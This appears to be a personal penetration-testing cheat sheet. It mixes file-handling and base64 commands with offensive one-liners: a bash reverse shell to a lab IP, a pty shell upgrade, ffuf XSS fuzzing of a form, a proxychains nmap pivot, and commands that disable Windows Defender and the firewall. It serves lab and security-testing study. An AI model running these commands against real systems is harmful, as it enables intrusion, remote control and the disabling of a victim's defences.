(constantly under construction)

Python interactive shell

  1. python3 -c 'import pty;pty.spawn("/bin/bash")'

Linux Reverse Shell in one line

  1. /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.74/443 0>&1'

File Extraction

  1. tarball: tar -xvf <filename.tar.gz or just .tar> -C <target directory>
  2. zip: unzip -q <filename.zip> -d </path/to/dir>

File Compression

  1. tarball (-z gzips it, so name it .tar.gz): tar -czvf archive.tar.gz file1 file2
  2. zip: zip -q <archivename.zip> file1 file2 file3

Base64 encode and decode

  1. Directly at the command line
    • echo -n "plaintext" | base64
    • echo -n "base64 encoded" | base64 --decode
  2. From a text file, when the content contains special characters
    • base64 input.txt
    • base64 --decode input.txt

FFUF fuzzing

The general flags

  • Put the keyword FUZZ in the field you want to fuzz or enumerate.
  • -w, to specify the wordlist
  • -X POST, to specify the HTTP method
  • -d, to specify the data
  • -H, to specify the header value.
  • -mc all -ac, to match every response code and auto-calibrate the filters so the baseline (default) response is hidden.
    • -fc 404,502, to filter out responses with status code 404 and 502
  • -fs, filter out responses of the given size(s); separate multiple values with a comma
  • -fw, filter out responses with the given word count(s); separate multiple values with a comma
  • -e, adding the extension
  1. XSS fuzz with POST request
    • ffuf -w /usr/share/wordlists/seclists/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt -u http://10.129.232.215:5000/support -X POST -d "fname=123&lname=123&email=hello%40123.com&phone=123&message=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -mc all -ac
  2. directory enumeration
    • ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.129.232.215:5000/FUZZ -mc all -ac

Nmap Proxychains scan

  1. sudo proxychains nmap -sT --top-ports 20 -Pn 172.16.x.194

Disable AV and Firewall

  1. powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true" & netsh advfirewall set allprofiles state off
  2. Set-MpPreference -DisableRealtimeMonitoring $true & netsh advfirewall set allprofiles state off